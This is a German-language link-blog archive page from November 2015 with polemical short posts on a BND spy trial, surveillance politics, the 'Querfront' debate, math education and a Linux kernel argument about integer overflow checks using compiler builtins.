[l] Es kommt nicht häufig vor, dass man im Internet einen Hacking-Talk findet, der tatsächlich Neuland betritt. Und der nicht nur "oh guck mal, nachdem man ein System geownt hat, kann man DIESE FURCHTBAREN DINGE TUN" ist. Daher freue ich mich sehr, heute auf diesen Foliensatz aufmerksam gemacht worden zu sein. Wenn man eine Grafikkarte mit OpenGL oder programmiert, dann schreibt man die Shader in einer Programmiersprache namens GLSL, und der Treiber übersetzt das dann hardwarespezifisch in Binärcode und lädt das auf die Grafikkarte. Echte Hacker möchten natürlich gerne diesen Binärcode verstehen und gucken, ob man auf Grafikkarten in dem Binärcode spannende Dinge machen kann. Stellt sich raus, dass OpenGL ein API dafür hat, den kompilierten Bytecode auszulesen und hochzuladen. Gedacht ist das fürs Caching, denn das Kompilieren von GLSL dauert ja Zeit, und die will man wenn möglich nach einem Alt-Tab oder so einsparen. Dieser Typ hat jetzt mit diesem API herumgespielt, und festgestellt, dass ein geschachteltes ELF-Binary rausfällt und dass es einen Disassembler gibt, und dann hat er sich hingesetzt und einen Assembler dafür gehackt.

Fri Nov 20 2015

[l] Ein Trend in modernen IT-Umgebungen ist ja BYOD. Bring Your Own Device. Man kennt das von Gammel-Multimedia-Startups aus Berlin Mitte, wo das Startup nicht genug Geld hat, um den Mitarbeitern Arbeitsgerät zur Verfügung zu stellen, und wo die Leute dann halt mit ihren Privatlaptops arbeiten.
Aber wusstet ihr, dass auch der BND BYOD macht? Nein, wirklich!
Den Verräter in den eigenen Reihen erkannte der BND erst im Juli 2014. Bis dahin hatte Markus R. zwei Jahre lang sogar ein Notebook der CIA eingeschleust und darüber Mails an seinen Verbindungsmann geschickt. „Ich war sehr wütend, weil ich nicht in den technischen Bereich wechseln durfte“, sagte Markus R. gestern. Die Männer vom CIA hingegen hätten ihn stark geredet – und viel Geld bezahlt.
Nein, du bist kein Totalversager! Du bist ein total toller Hecht! Hier hast du ein bisschen Portokasse, und wir inszenieren auch ein tolles James-Bond-Deaddrop-Bullshitbingo für dich, damit du dir wichtig vorkommst!1!!
Laut Anklage kassierte R. bis Ende 2009 rund 15 000 Euro, in den Jahren danach fuhr er fünf Mal nach Österreich, wo sein Honorar in Verstecken deponiert war – jeweils bis zu 20 000 Euro in bar.
M(
Warte, reicht euch noch nicht? Gibt noch mehr!
Der Angeklagte räumte auch die Kontaktaufnahme mit dem russischen Generalkonsulat in München ein, um sich dort als Informant anzudienen. Da habe er aber schnell wieder einen Rückzieher gemacht: "Da habe ich Bedenken bekommen, dass es doch schon eine andere Hausnummer ist, für die Russen zu arbeiten als für die Amerikaner." Denn mit den USA gebe es ja vom BND aus eine enge Zusammenarbeit.
Ja eben, die haben uns eh komplett in der Tasche, da kann ich mich ja auch noch mal ein bisschen für die Verkürzung der Dienstwege bezahlen lassen!1!! Bürokratieabbau! (Danke, atoth)

Thu Nov 19 2015

[l] Von wo aus tweeten eigentlich die ISIS-Unterstützer mehrheitlich? Hier hat mal jemand eine anschauliche Grafik gemacht.

Tue Nov 17 2015

[l] Liebe Leser, ich möchte heute mal einen Gedanken entwickeln, was wir in Zukunft anders machen könnten, um einen positiven Gesamteffekt zu erzielen.
Mir ist aufgefallen, dass die Politik immer und immer wieder Dinge verspricht und dann nicht einhält. Zumindest stellt sich dieser Eindruck ein, weil die Versprechen immer möglichst nebulös und nachträglich verhandelbar formuliert werden.
Ich schlage daher eine Initiative zur Steigerung der Ehrlichkeit in der Politik vor. Und zwar möchte ich gerne einführen, dass Gesetze nur noch gemacht werden dürfen, wenn klare (im Sinne von maschinenauswertbar) Kriterien mit vergeben werden, was das Gesetz bis wann erreichen will, und ab welchen Ergebnissen es als Fehlschlag gilt. Und dann möchte ich gerne, dass beim Gesetz schon angegeben wird, welcher Minister zurücktreten wird, wenn die Fehlschlaggrenze erreicht wird.
Nehmen wir als Beispiel mal die biometrischen Daten im Pass. Hier war das Versprechen, dass a) die Pässe sicherer werden (waren sie schon vorher) und b) die Daten schon nicht wegkommen werden. Wenn jetzt also die Daten doch wegkommen, dann sollten Köpfe rollen. Wegkommen hätte ich definiert als "eine Nicht-Regierungs-Institution oder eine fremde Regierung erlangt Zugriff auf die Passdaten". Und dann hätte ich gerne, dass wenn es zum Fail-Fall kommt, nicht herumdiskutiert und -laviert und kleingeredet wird, sondern es eine völlig klare, unmissverständliche Ansage gibt, die schon beim Gesetz-Inkrafttreten festzementiert wurde, wer dann zurücktreten muss.
Ich habe schlicht keinen Bock mehr auf Mautsysteme, deren Daten ganz sicher garantiert niemals nicht für gar keine Sachen verwendet werden außer für Mautabrechnung, und dann hat plötzlich die Polizei Zugriff, und wahrscheinlich auch die Dienste und was weiß ich noch wer sonst alles.
[l] Herr BND-Mitarbeiter, wieso haben Sie Informationen an die CIA verkauft?
Ich wollte mich beweisen!
Frust, Langeweile, Unzufriedenheit und Unterforderung am Arbeitsplatz: Damit begründete der 32-jährige Angeklagte vor dem Oberlandesgericht München seine Spitzeltätigkeit. Er habe im BND den Eindruck gehabt, dass man ihm nichts zutraue. So seien ihm immer wieder Versprechungen gemacht worden, die nicht eingelöst worden seien.
(Danke, Carsten)

Sat Nov 14 2015

[l] Wenn wir mal ehrlich wären, müssten wir jetzt den ganzen Überwachungsstaat zurückrollen. Frankreich hat Vorratsdatenspeicherung, Videoüberwachung öffentlicher Plätze, einen eigenen Geheimdienst mit Massenüberwachungsprogramm, kürzlich wurden erst noch drakonischere "Sicherheits"gesetze verabschiedet. Hat alles nichts gebracht.
Hat der Uhl eigentlich schon die Vorratsdatenspeicherung gefordert?
Oh übrigens. Das Narrativ geht ja immer so, dass sich für Politiker mehr "Sicherheit" immer lohnt, weil es keine politischen Nachteile hat, aber einen Terrorangriff nicht vereitelt zu haben, das hat politische Nachteile. Hat das eigentlich mal jemand auf Herz und Nieren geprüft? Wo hat denn wann jemals eine Regierung nach einem Terroranschlag Ärger gekriegt, weil sie einen zu wenig krassen Polizeistaat ausgerollt hatten?
Selbst bei Bush und 9/11 stellt sich jetzt raus, dass der jahrelang recht konkrete und apokalyptische Warnungen ignoriert hat, und erst nach 9/11 hat er den ganzen Patriot-Act-Scheiß gemacht. Hat der jemals Konsequenzen ziehen müssen für sein Totalversagen? Nix da, der hat in Ruhe seine Amtszeit abgesessen bis hin zu "Mission Accomplished".
Besonders gruselig an der Story hinter dem Link:
George W. Bush personally rejected two techniques in the CIA's proposed enhanced interrogation program. (One of them was believed to have been “mock executions.” The accepted proposals, including waterboarding, have been roundly criticized as torture.)
Wenn ihr die Zeit habt, lest euch statt der Zusammenfassung lieber die Primärquelle durch.

Fri Nov 13 2015

[l] Noch ein Gedanke zur Querfront.
Ich verstehe die Angst davor, aus Sicht einer linken Gruppe, von Nazi-U-Booten infiltriert und heimlich umgebogen zu werden.
Ich frage mich jetzt, ob das Angst vor tatsächlicher Unterwanderung ist, oder eher so "was wenn dem auf einer Demo jemand ein Mikrofon hinhält und er kloppt dann ausländerfeindliche Pegidisten-Parolen raus?" Haben Linke mehr Angst davor, dass ihnen ihre schöne Bewegung von innen kaputtsabotiert wird? Oder ist es eher Angst, dass ihr eigener Ruf als Linker beschmutzt werden könnte, wenn sie öffentlich mit sich als Nazis herausstellenden Menschen gesehen werden?
Ich frage das, weil ich mal in die Gegenrichtung argumentieren möchte. Die Gefahr bei Unterwanderung ist ja weniger aktive Sabotage. Damit meine ich jetzt sowas wie "wird Schatzmeister und veruntreut die Kohle" oder "übernimmt Führungsposition und trifft lauter katastrophale Entscheidungen". Das kann man ja verhindern, solange die U-Boote nicht die Mehrheit haben. Und wenn sie die Mehrheit haben, dann muss man sich ja fragen, ob hier tatsächlich Rechte die Linken unterwandern oder umgekehrt.
Aus meiner Sicht wäre die eigentliche Angst bei Unterwanderung daher, dass die durch den Aufbau von Gruppendruck oder ähnlichen psychologischen Effekten den Konsens in der Gruppe umbiegen können.
Und diese Befürchtung ist durchaus gerechtfertigt. Ich persönlich finde wenig im Leben so gruselig wie Gruppendynamiken und Schwarmverhalten. Wie Menschen in einer Gruppe ihre negativsten Aspekte herauskehren können.
Aber das ist ja ein zweischneidges Schwert. Hier daher mein Argument: Könnte man den Spieß nicht umdrehen und das als geradezu einmalige Gelegenheit werten, wie man den Konsens bei den Rechten durch Effekte der Gruppendynamik umbiegen kann?
Die einzige echte Gefahr, die ich sehe, ist wenn die Rechten eine Extremposition fordern und die Linken dann einen Kompromiss "in der Mitte" zwischen Status Quo und Extremposition machen, und so die Mitte immer weiter nach rechts wandert. Aber wenn man sich dessen bewusst ist, und solange man die Mehrheit hat, kann man das ja verhindern.
Wieso sieht das also niemand als tolle Gelegenheit? Wieso gibt es da so viel Furcht?
Hat das vielleicht damit zu tun, dass die Linken es jetzt erstmals (?) mit intellektuell nicht völlig stumpfen Hohlbirnen zu tun haben? Mein Eindruck ist ja, dass die Linken es sich auf dem hohen "die Nazis sind alle dumm" Thron bequem gemacht haben, und auf Argumente von Rechts durch Filterblasen und "No Platform" reagiert haben, und jetzt sind sie nicht vorbereitet auf den Fall, dass die rechte Ideologie dann halt über U-Boote kommt. Plötzlich sind die Linken mit rechtem Gedankengut nicht von außen sondern von innerhalb ihrer Friedensgruppen konfrontiert.
Was meint ihr?
[l] Zu dem Querfront-Kram kamen, wie zu erwarten war, echt viele Mails ein. Hier mal eine Mail zu dem Thema, die ich ganz erhellend fand:
Nehmen wir mal folgendes Beispiel: Jemand ist Mitglied in einer Organisation, Stiftung oder so, die sich fuer Humanismus, Aufklaerung und gegen religioese Dogmatik einsetzt. Nun kommen ein paar Leute daher und "kapern" den Themenkomplex Religionskritik und machen daraus, gemaess ihrer Ideologie, Islam- bzw. Moslemkritik. Der obige Jemand findet aber, dass man keinen Unterschied machen sollte zwischen den einzelnen, von ihm fuer falsch gehaltenen Religionen und sieht diese Versuche, aus generalisierter Religionskritik eine spezifische, der aktuellen Situation angepasste Islamkritik zu machen. Und dabei bleibt es ja nicht. Es wird dann auch nicht mehr einfach nur der Islam als Religion kritisiert (was an sich nichts verwerfliches ist, es sei denn, man bleibt dort stehen), sondern der einzelne Glaeubige. Moslems werden zur Zielscheibe der Kritik gemacht, und hier beginnt mMn das Querfrontbestreben von Rechts.
Uebrigens, wie du dir denken kannst, ist dieses Beispiel garnicht so hypothetisch: die Giordano-Bruno-Stiftung wird seit einiger Zeit von Leuten, die ich als Querfrontler bezeichnen wuerde, "unterwandert". Und die Methoden und Mechanismen der Einflussnahme auf den "Mainstream-Konsens" (eher links-liberal ;) ) innerhalb des Foerderkreises der Stiftung sind, der einfachen Tatsache angemessen, dass dort eher keine willfaehrigen Pegidioten rumkreuchen, subtil und, auf den ersten Blick, intellektuell ansprechend.
OK, also mit anderen Worten: Das Querfront-Phänomen gibt es wirklich. Ich blogge das hier als Klarstellung, dass ich das auch nicht bestreiten wollte.
Die Frage ist, gegen wen sich die Querfrontvorwürfe dann richten. Richtet sich das gegen "die Linken", die nicht mitkriegen oder nicht wirksam verhindern, dass sie ideologisch von Rechten gekapert werden? Oder richtet sich das gegen die Rechten und man will damit die Linken vor ihnen warnen?
Ich halte es für eine der Kernfragen an der Sache, was hier Ursache und was Wirkung ist. Sieht man die Unterwanderung der Friedensdemos von Chemtrailern und Nazis und warnt dann vor den Nazis mit dem Querfront-Label? Oder wirft man mit Querfront-Vorwürfen um sich und ekelt damit die Linken und das Zentrum weg und am Ende bleiben nur noch die Nazis übrig?
Update: Hier noch eine Einschätzung aus einer Mail:
Im Grunde ist "Querfront" nichts anderes als der aktuelle Versuch die Kommunikation zwischen den Protestgruppen zu unterbinden.
[…]
Ganz kurz: Querfront ist ein Kampfbegriff der Parteien und Medien, um ihre Meinungsführerschaft aufrecht zu erhalten und um Widerspruch ohne Diskussion diffamieren zu können (ausgrenzen).

Sun Nov 8 2015

[l] Wenn man so an die Gamergate-Geschichte denkt, dann stellt sich ja hauptsächlich eine Frage. Wieso hat das eigentlich noch keiner verfilmt?
Jetzt will es angeblich Amy Pascal verfilmen, mit ihrer Produktionsfirma Pascal Pictures.
Basis für die Verfilmung sollen die Memoiren von Zoe Quinn werden:
Quinns für September nächsten Jahres angekündigte Memoiren mit dem Titel "Crash Override: How To Save The Internet" sollen als Grundlage für den Film dienen.
Crash Override, ja? Sagt euch der Name was? Das war das Handle des Protagonisten in Hackers.
Und da werde ich ja jetzt doch ein bisschen ungehalten, muss ich sagen. Die Leute, die anderen Leuten "cultural appropriation" vorwerfen, wenn sich kleine Mädchen an Halloween als Pocahontas verkleiden, die appropriieren jetzt mal eben einen ikonischen Namen von den Hackern, einer verfolgten Minderheit. Aus einem Film, sogar, in dem es beim Plot darum geht, wie die Hacker vom FBI verfolgt werden.
Ich halte das ja für einen Versuch, mit den Hackern zu machen, was sie mit den Gamern gemacht haben. Sie in einen sinnlosen Streit hinein zu provozieren, bei denen sie ihre selbstgewählte Opferrolle ausbauen können.
Übrigens, aus den Foren: Gegendarstellung zu den Tatsachenbehauptungen der Heise-Autorin
Update: Wie mir gerade jemand mitteilt, ist der Stoff schon verfilmt worden :-)

Fri Nov 6 2015

[l] Kennt ihr den schon? Polizeigewerkschaft klagt, um ein Video wegzukriegen.
Und zwar geht es um ein paar Cops in Santa Ana, Orange County, Kalifornien. Die haben eine Razzia bei einem Pot Dispensary gemacht (in Kalifornien ist Cannabiskonsum und -verkauf legalisiert, aber es ist streng reguliert, wer das verkaufen darf).
Der Laden heißt Sky High Holistic marijuana dispensary. Ich erwähne das nur, weil ich schon den Namen alleine großartig finde :-)
So, was machen also die Cops? Sie stürmen den Laden mit gezogenen Waffen und Masken über dem Kopf. Wenn Cannabis nicht so eine beruhigende Wirkung hätte, hätte man fast befürchten müssen, dass einige der Kunden selber ihre Wummen zücken und die (aus ihrer Sicht) Räuber umnieten. Das geschah aber nicht. Die Kunden haben sich mit dem Gesicht nach unten auf den Boden gelegt.
Dann haben die Cops die Überwachungskameras abgestöpselt und haben die essbaren Waren in der Auslage zu essen angefangen. Leider haben sie eine der Kameras übersehen, und die hat sie schön Youtube-fertig gefilmt. Sagte ich Youtube? Ja, Youtube!
So und gegen dieses Video geht jetzt die Polizeigewerkschaft vor, weil sie nicht möchte, dass das als Beweis von der Polizeiaufsicht verwendet wird, um die Cops aus dem Verkehr zu ziehen.
Die Story an sich ist ja schon toll, aber lest euch mal die Details durch, wie sich die Cops über ihr gegenseitiges Verhalten unterhalten, und über den Staatsanwaltschaft, der diese Aktion abgesegnet hatte, und mit dem sie mal öffentlich saufen waren (öffentlich saufen ist in den USA verboten, daher werden Alkoholika in der Regel in undurchsichtigen braunen Tüten verkauft. Die dürfen Cops dann nur "durchsuchen" und den Alkohol finden, wenn sie "probable cause" vorzuweisen haben.
Ein schöner Fall von "Die Polizei, dein Freund und Helfer!" (Danke, Mathias)

Wed Nov 4 2015

[l] Verschwörungstheorie der Woche: Die Ada Initiative führt Honeypot-Entrapment-Versuche an männlichen Open-Source-Aktivisten durch, um danach "Vergewaltigungsversuch!1!!" zu brüllen. Insbesondere behauptet seine Quelle, Linus sei schon mehrfach (!?!?) Ziel solcher Versuche geworden, und bewegt sich auf Konferenzen nie mehr alleine herum deswegen. Die Ada Initiative hat Anfang des Jahres zugemacht, insofern können die sich jetzt nicht mehr wehren.
Bei solchen Theorien muss man ja immer sehr vorsichtig sein. Aber wichtig ist ja auch nicht, ob man das glaubt oder nicht, sondern wie sich alleine die Existenz dieses Vorwurfes auf die Gesellschaft auswirkt.
[l] Das erste Schwein hat sich am eCall-Trog eingefunden: Geisterfahrerprävention! Da kann ja wohl niemand was dagegen haben. Endlich haben wir eine Rechtfertigung für die Massendatenerhebung auf Autobahnen. Phew. Ich hatte mir schon Sorgen gemacht, dass sich da niemand was aus dem Arsch gezogen kriegt.
Was wohl passiert, wenn die merken, dass die Auflösung von GPS im Allgemeinen nicht reicht, um die Straßenseite sicher zu erkennen? (Danke, James)
[l] Zu der Frage zum Zustand der Mathe-Ausbildung kamen ein Haufen Kommentare rein, mit einer bemerkenswerten Streuung an Aspekten, und mehrere davon kamen von Lehrern. Ich will mal ein paar zusammenfassen oder zitieren, für alle reicht der Platz nicht.
Besonders interessant fand ich den Hinweis auf problem-solution ordering issues, eigentlich ein Problem aus dem Design von Spielen. Man muss den Spieler erst in das Problem laufen lassen, bevor man ihm die Lösung zeigt, sonst versteht der Spieler nicht, dass das die Lösung zu dem Problem ist und kommt das nächste Mal nicht weiter, wenn er ein ähnliches Problem hat. Und die Dinge wirken auch weniger sinnlos, wenn man erst das Problem zeigt, das sie lösen. Die Erklärung kann man auch auf den Matheunterricht anwenden.
Jemand anderes wies darauf hin, dass das kein Mathe-Ding ist sondern natürlich auch bei Computern häufig vorkommt, dass Leute es für völlig normal und akzeptabel halten, "von Computern keine Ahnung zu haben" und von dir dann zu erwarten, dass du ihnen mal schnell ihr Problem fixt.
Man steckt da 20-30 Jahre Erfahrung in die Problemlösung rein, aber es wird noch nichteinmal anerkannt.
Weitere Einsender meinten, das Problem komme schon aus dem Elternhaus.
Ich bin u.a. Mathelehrer an einem Gymnasium - und da kommt es bei einem Elternsprechtag schonmal vor, dass man eine Mutter vor sich sitzen hat, die die Minderleistung ihrer Tochter mit einem Achselzucken abtut und mit einem Schmunzeln berichtet, dass sie selbst auch schon schlecht in Mathe gewesen wäre. Da könne man wenig machen. - Sprich: Fehlleistungen werden auf eine Art "Mathe-Gen" geschoben und die Notwendigkeit, sich mal intensiver damit zu beschäftigen nicht gesehen. Ist halt nur Mathe!
Dann kam noch diese schöne Kabarettnummer in PDF-Form rein, die ich weiterempfehlen kann.
Eine weitere Einsendung äußert die These, dass das Auswendiglernen von irgendwelchen Daten und Fakten bei uns in der Gesellschaft einen höheren Stellenwert zu haben scheint als Fähigkeiten oder die Kenntnis von Verfahren oder "Skills", wie man heute sagen würde. Als Indiz dafür weist die Einsenderin auf TV-Shows wie "Wer wird Millionär" hin, ich würde das noch auf Talkshows und politische Debatten ausweiten. Da punktet man auch mit obskuren Fakten und nicht mit Fähigkeiten oder der Kenntnis von Verfahren. Außerdem sind Fakten im Überfluss frei im Internet verfügbar, aber für Verfahren gilt das in deutlich geringerem Umfang.
Eine weitere Einsendung postuliert, dass Mathematik nicht als Lösung sondern als Problem gesehen wird. Mathematik lernt man nicht, weil es zum Verständnis der Welt beiträgt.
Die Textaufgabe, eigentlich genau das, was am Ende vom Matheunterricht wenigstens übrig bleiben sollte - nämlich ein reales Problem in Zahlen zu übertragen und damit diesem dann bei kommen zu können - ist die gefürchtetste aller Aufgaben und wird daher oft marginalisiert oder weg gelassen, damit das Debakel nicht zu groß wird oder "nicht auch noch der letzte Spaß an der Mathematik verloren geht".
Ein Psychologe kommentiert:
Denk bei der Debatte auch daran, WER da stolz auf WAS ist. Menschen, die eher im geisteswissenschaftlichen Bereich unterwegs sind, drücken mit der Mathe-Ablehnung häufig auch eine ideologische Haltung aus. Menschen möchten gerne einzigartig und individuell sein. In der Mathematik sollte bei der selben Frage bitte immer dieselbe Antwort rauskommen, sonst wäre es ja nicht deterministisch.
[…]
Vielen Menschen ist es sehr wichtig, dass ihre Meinung, Intelligenz oder Persönlichkeit nicht erfasst und damit vergleichbar gemacht wird. Bspl Intelligenz. Jeder ist überzeugt er hat genug davon, aber wenn alle getestet würden, wäre offensichtlich, dass manche höhere IQ Werte haben als andere. Intelligenz ist halt ziemlich gut normalverteilt. Die Ablehnung von Mathematik ist häufig verbunden mit einer Argumentation wie „es gibt ja wichtigeres im Leben“. Dieses wichtigere ist oftmals durch Mathe bedroht, weil es einer Überprüfung mittels Mathe entweder nicht zugänglich ist oder nicht standhält. Es kann halt keiner quantifizieren, ob Cicero oder Seneca die bessere Literatur ist. Und manchmal hat die Mathematik auch mal Antworten parat, die eigene Glaubenssysteme in Frage stellen (z.B. bei Homöopathie, global warming, Casinokapitalismus). Da muss man manchmal die Vergleichsdimension abwerten, um damit leben zu können.
[…]
Stell Dir mal vor, Du würdest auf Deinem blog diskutieren, ob nun Linux, MacOS X oder gar Windows das beste Betriebssystem wäre. Jemand hat einen Test gemacht und Windows hat die höchsten Werte oder so. Die Diskussion wäre unvermeidlich: falsche Metrik, unrealistische Fragestellung, unreliable Messung, da gibt es andere wichtige Dinge, die gar nicht erfasst wurden, usw. Wenn alles diskutieren nichts hilft, dann hilft nur die ultimative kognitive Dissonanz: eigentlich sagen diese Zahlen doch eh nichts aus.
Bedenke immer, dass das gesunde, normale Prozesse sind. Menschen, die alles immer realistisch sehen und sich nicht selbst aufwerten, sind tendentiell depressiv.
So habe ich Depressionen noch nie gesehen!
Mein persönliches Highlight war eine Mail dieser Form:
Zu der Fraktion gehörend, die die Integralrechnung zwar oberstufenkonform durchgepaukt, aber Mathematik jenseits des Dreisatzes eigentlich nie wirklich verstanden hat, hier ein paar Gedanken darüber:
[… eine Seite Reflektion und Selbstanalyse …]
Jetzt, wo ich aufschreibe, komme ich mir unfassbar engstirnig, unwissend und naiv vor!
Dann gibt es noch die These, dass Matheahnungslosigkeit schon im Kindergarten beginnt:
Als Spieldesigner für Kindergartenspiele habe ich ein mathematisches Lernspiel entwickelt, das von den Kindergärtnerinnen häufig mit der Begründung „Ach, das habe ich früher nie verstanden.“ oder „Nein, das lernen unsere Kinder hier nicht“ abgelehnt wurde. Was man selbst nicht versteht, müssen die Kinder also auch nicht verstehen. Das heißt der niedrige Stellenwert der Mathematik setzt sich von Generation zu Generation fort. Eltern, die Mathematik nicht verstehen, geben diese Ablehnung an ihre Kinder weiter. Genauso machen es auch Kindergärtnerinnen und sogar Lehrer aus mathematikfremden Fächern.
Das finde ich eine sehr gruselige Vorstellung.
Ich finde es bedauerlich aber auch menschlich, dass bei solchen Fragestellungen erstmal die Vorurteile bedient werden, daher habe ich das hier auch mitzitiert. Ein weiterer solcher Fall ist, dass Lehramtsstudenten an den Mathefachbereichen fachlich schwächer sind als "echte" Mathestudenten, die auf Diplom oder so hinarbeiten. Es gab auch mehrere Empfehlungen dieses TED-Videos von Conrad Wolfram (der kleine Bruder von dem Mathematica-Entwickler).
Ein weiterer Einsender erzählt:
Bei uns an der Hochschule wird Mathe immer weniger unterrichtet. Auf dem Linux-Event unserer Hochschule im Jahr 2014 haben mich die Ehemaligen mit großen Augen angeguckt als ich erzählt habe dass wir nur noch zwei Semester lang Mathe haben, nicht mehr vier (merke: Das ist eine Hochschule, da gibts also nicht mal wirklich "schlimme" Mathe). Inzwischen ist es sogar so, dass nur noch die "puren" "Informatiker" zwei Semester Mathe haben. Die "Computernetzler" zum Beispiel haben nur noch ein Semester Mathe!
Die Frage ist natürlich, was hier woraus folgt. In meiner Informatik-Studienzeit hat sich auch nicht gerade der Eindruck aufgedrängt, dass man Mathe wirklich braucht. Das hat man halt belegt, weil es Pflichtkurse waren.
Ein weiterer Lesetipp ist Lockhart's Lament. Ein fieser Soziologiestudent wies dann noch darauf hin, dass so gut wie niemand dann tatsächlich Cicero liest :-)

Mon Nov 2 2015

[l] Oje, Linus hat mal wieder auf LKML herumgerantet, diesmal ging es um Integer Overflow Checks. Hier ist der Code vorher:
```
mtu -= hlen + sizeof(struct frag_hdr);
```
Und hier ist, was der neue Code tut:
```
if (overflow_usub(mtu, hlen + sizeof(struct frag_hdr), &mtu) || mtu <= 7)
  goto fail_toobig;
```
Als erstes fällt auf, dass der Code nicht das selbe tut. Nehmen wir mal an, dass overflow_usub zwei unsigned ints subtrahiert und dann meckert, wenn das Ergebnis negativ würde. Dann fängt dieser Code nicht nur den Overflow ab, sondern er prüft auch, dass mtu danach mindestens 8 ist. Allerdings prüft der Code nicht, ob hlen + sizeof(struct frag_hdr) bereits überläuft. Und das ist an sich schon ein Problem. Komme ich gleich drauf.
Linus' Kritik ist im Wesentlichen: Ist schlecht lesbar, ist ineffizient und immer noch unsicher.
Ich glaube, dass er bei allen drei Kritikpunkten irrt. Hier ist Linus' Gegenvorschlag, wie der Code lesbarer aussehen könnte:
```
if (mtu < hlen + sizeof(struct frag_hdr) + 8)
  goto fail_toobig;
mtu -= hlen + sizeof(struct frag_hdr);
```
Ich finde das lesbar. Aber ich mache das auch beruflich, in Code nach Integer Overflows zu checken. Viele Programmierer werden sich das angucken und gar nicht verstehen, was hier das Problem ist, das da geprüft wird. Wenn das Label nicht "fail_toobig" hieße, wäre gar nicht klar, was hier eigentlich geprüft werden soll. Linus' Version ist daher meiner Meinung nach nicht lesbarer. Und sie hat eine gewisse Fragilität. Wenn hlen ein size_t ist und beliebig groß sein kann, schlägt der Test fehl. Wird hier nicht so sein, so gut wie niemand hat 64-bit Headerlängen in der Praxis in seinen Protokollen. Aber es gibt Ausnahmen. Gut, nehmen wir mal an, hlen ist ein unsigned short (oder wir sind auf einer 64-bit-Plattform und hlen ist ein unsigned int). Wenn der Compiler das evaluiert, gibt es keinen Overflow, wenn in der Reihenfolge, in der der Compiler das evaluiert, zuerst eine Addition mit dem sizeof-Wert gemacht wird. Dann promoted C den Typ des Ergebnisses zu size_t, das ist an der Stelle groß genug und hat keine Overflow-Probleme. Aber was wenn ein weniger fitter Programmierer so einen Test zu bauen versucht und die Reihenfolge verkackt?
```
if (mtu < hlen + 8 + sizeof(struct frag_hdr))
```
Wenn das sorum dasteht, und hlen groß genug reinkommt, und der Compiler hlen+8 zuerst evaluiert, dann kann der Teil überlaufen und wir addieren auf das abgeschnittene Ergebnis das sizeof drauf und das ist dann size_t, aber hatte schon einen Überlauf. Meines Wissens gibt es keinen Compiler, der Linus' Ausdruck böswillig umsortieren würde. ~~Aber der Standard garantiert keine Reihenfolge der Auswertung. Der Compiler dürfte das meines Wissens machen. Und würde damit Linus' Check kaputtmachen.~~
Die Compiler-Builtins, die hinter diesem Makro stehen, sind hier beschrieben. gcc hat das ursprünglich von clang geklaut, aber hat es an einer wichtigen Stelle besser und damit überhaupt erst ordentlich benutzbar gemacht. Bei clang musste man anfänglich je nach Datentyp ein anderes Builtin aufrufen, und das ist natürlich auch voll für den Arsch, denn diese Subtilitäten sind ja gerade die Fehlerquelle, die wir durch sowas ausschließen wollen. Heute gibt es auch bei clang __builtin_add_overflow, und das sieht in Beispielcode so aus:
```
#include <stdlib.h>int s(int a,int b) {
  int c;
if (__builtin_add_overflow(a,b,&c))
    exit(1);
  return c;
}
```
Der Compiler erzeugt für diese Funktion diesen Code:
```
s:
        movl    %edi, %eax
        addl    %esi, %eax
        jo      .L9
        rep ret
.L9:
[… Error handling …]
```
Aus meiner Sicht ist dieser Code an dieser Stelle optimal. Ich wüsste jedenfalls nicht, wie man das besser machen könnte. Das "rep ret" ist übrigens ein Fix für einen Bug in einem der ersten 64-bit Athlons damals. Wusstet ihr nicht? Ja, so ist das, die Compiler sind ziemlich smart heutzutage. Smarter als die meisten Programmierer :-)
Was ich damit sagen will: Nein, Linus, die Builtins generieren keinen schlechten Code. Wenn der Code an der Stelle mehr tut als einen Conditional Jump einfügen, der im Normalfall nicht genommen wird (und damit fast kostenlos ist), dann war der Compiler möglicherweise smarter als du an der Stelle und hat erkannt, dass die beiden reinkommenden Typen nicht gleich breit waren und einen zusätzlichen Check eingefügt, ob ein Zwischenergebnis abgeschnitten wird.
So. Also nochmal zu den drei Argumenten. Unlesbar bestreite ich, weil bei dem Makro explizit und offensichtlich ist, was der Programmierer erreichen will. Das ist immer besser als eine Packung Ultrasmart-Bitpfriemel-Kram, bei dem der Auditor zehn Minuten braucht, bis er versteht, was hier der Trick und das gewünschte Ergebnis ist, und ob der Weg dahin überhaupt korrekt ist.
Das zweite Argument war Ineffizienz. Das habe ich gerade widerlegt.
Das dritte Argument war Unsicherheit. Nun, Linus, das mag jetzt schmerzen, aber der Code ist sicherer als der vorgeschlagene Ersatzcode :-)
Daher, liebe Leser: Wenn ihr C programmiert, und euch fragt, ob ihr lieber die Builtins verwenden sollt oder auch alte Compiler unterstützten, dann NEHMT DIE BUILTINS. Ich bin sogar dafür, gar keinen Fallback-Pfad für alte gcc-Versionen anzubieten. Wer neuen Code mit alten Compilern übersetzt, hat verdient, dass das kracht. Diese ganze Debian-Antiquitätenhändler-Fraktion braucht mal ein paar Warnschüsse vor den Bug. Das ist ja schlimmer als Windows XP!
Wenn ihr überlegt, ob ihr lieber selber Overflow-Checks hackt oder lieber die Builtins nehmen sollt, NEHMT DIE BUILTINS.
Wenn ihr überlegt, ob ihr Overflow-Checks braucht oder nicht, dann NEHMT DIE BUILTINS. Die Checks kosten so gut wie nichts. Nein, wirklich. Da muss man sich anstrengen, um das überhaupt mit geschickten Mikrobenchmarks messen zu können. Und wenn der Check an der Stelle überflüssig wäre, und gcc das erkennen kann, dann fliegen auch die eh schon fast kostenlosen Checks noch raus.
Es gibt keine Ausreden. Nehmt die Builtins. Jedes einzelne Mal. Insbesondere, wenn es um Multiplikation geht. Das verkacken so viele Programmierer da draußen, dass ich das naheliegende Trinkspiel aufgeben musste. Probiert es gar nicht erst. Nehmt die Builtins. Und ich empfehle euch das, obwohl mein Lebensunterhalt davon abhängt, dass es Leute gibt, die nicht die Builtins benutzen.
Update: Wie sich rausstellt, sagt der C-Standard doch was zur Assoziativität von arithmetischen Operatoren. Der Compiler darf sich also nicht aussuchen, in welcher Reihenfolge er was addiert.

Sun Nov 1 2015

[l] In eigener Sache: Neulich linkte ich zu einem Beitrag einer alten Usenet-Bekanntschaft von mir zum Thema "VW in den 1980er Jahren". Er vertrat dort die These, dieser Abgasskandal gerade sei ja nichts im Vergleich zu dem, was sich VW damals geleistet habe.
Der gute Mann hat sich gerade nochmal gemeldet, denn er hat nochmal was geschrieben, diesmal nicht zu VW sondern zu mir.
Wenn ich zu seinen Aussagen etwas beitragen darf: Mir ist ja ein Feind, der nachdenken, sich artikulieren und logisch denken kann viel lieber als ein Freund, der mir auf die Schulter klopft und mir nicht sagt, wenn ich einen Fehler gemacht habe.
